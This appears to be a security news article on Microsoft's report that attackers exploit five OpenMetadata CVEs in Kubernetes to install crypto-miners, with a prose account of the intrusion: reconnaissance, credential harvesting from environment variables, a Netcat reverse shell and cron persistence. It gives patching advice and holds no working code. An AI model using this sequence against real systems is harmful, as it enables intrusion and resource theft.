Microsoft Warns: Cybercriminals Exploit OpenMetadata Flaws to Mine Cryptocurrency

Unpatched OpenMetadata vulnerabilities, disclosed in March, are being actively exploited by malicious actors to gain access to Kubernetes environments and install crypto-mining malware. These vulnerabilities allow attackers to bypass authentication, gain remote code execution, and steal AWS credentials to mine cryptocurrency on victims' resources. Microsoft recommends administrators update OpenMetadata images to the latest version and implement strong authentication to mitigate these risks.

Cybercriminals Exploit OpenMetadata Vulnerabilities to Mine Cryptocurrency, Microsoft Warns

In a chilling exposé, Microsoft has unveiled a disturbing trend: cybercriminals are actively exploiting vulnerabilities in OpenMetadata, an open-source software suite, to mine cryptocurrency at the expense of unsuspecting victims. These exploits, which have been ongoing since early April, are targeting Kubernetes environments where OpenMetadata is deployed without the necessary security patches.

Unpatched OpenMetadata Systems: A Gateway for Malicious Actors

OpenMetadata vulnerabilities, disclosed in March, encompass a range of critical and high-severity flaws that can be exploited to bypass authentication and gain remote code execution (RCE) within OpenMetadata deployments. Microsoft's threat intelligence team has identified five specific CVEs that are being leveraged in these attacks:

• CVE-2024-28255: Critical improper authentication vulnerability (CVSS: 9.8)
• CVE-2024-28847: High-severity code-injection vulnerability (CVSS: 8.8)
• CVE-2024-28253: Critical code-injection vulnerability (CVSS: 9.4)
• CVE-2024-28848: High-severity code-injection vulnerability (CVSS: 8.8)
• CVE-2024-28254: OS command injection vulnerability (CVSS: 8.8)

These vulnerabilities provide attackers with a gateway into vulnerable systems, allowing them to penetrate OpenMetadata containers and execute malicious commands. The attackers' primary objective is to surreptitiously mine cryptocurrency using the victims' computing resources.

The Attack Sequence: A Step-by-Step Account

The attack sequence begins with attackers scanning for Kubernetes-based deployments of OpenMetadata that are exposed to the internet. Once they identify vulnerable systems, they exploit the unpatched CVEs to gain access to the container. From there, they execute a series of commands to gather intelligence about the victim's environment, including network and hardware configuration, OS version, and active users.

"As part of the reconnaissance phase, the attackers read the environment variables of the workload," explained Microsoft security experts Hagai Ran Kestenberg and Yossi Weizman. "Those variables may contain connection strings and credentials for various services used for OpenMetadata operation, which could lead to lateral movement to additional resources."

Crypto-Malware Deployment and Remote Access

Once they have gained a foothold, the attackers download crypto-mining malware from a remote server in China. In some cases, the attackers have even left behind a desperate plea, hoping to evoke sympathy from their victims:

"Hi man. I've seen several organizations report my Trojan recently. Please let me go. I want to buy a car. That's all. I don't want to hurt others. I can't help it. My family is very poor. In China, it's hard to buy a suite. I don't have any accommodation. I don't want to do anything illegal. Really, really if you are interested, you can give me XMR, my address is…"

It remains unclear whether this sob story has swayed any victims into transferring Monero crypto-coins to the attackers.

After deploying the mining malware, the attackers establish a reverse shell connection using Netcat to maintain remote access to the container. Additionally, they install cronjobs for scheduling, ensuring that the malware will execute at predetermined times.

Protecting Against Crypto-Mining Exploits

Microsoft strongly urges administrators running OpenMetadata workloads in their Kubernetes clusters to ensure that the image is up to date. If OpenMetadata is exposed to the internet, strong authentication measures should be implemented, and default credentials should be avoided.

These vulnerabilities serve as a sobering reminder of the importance of timely security patching and the consequences of neglecting software updates. Organizations are advised to adopt a proactive approach to vulnerability management to mitigate the risks posed by malicious actors.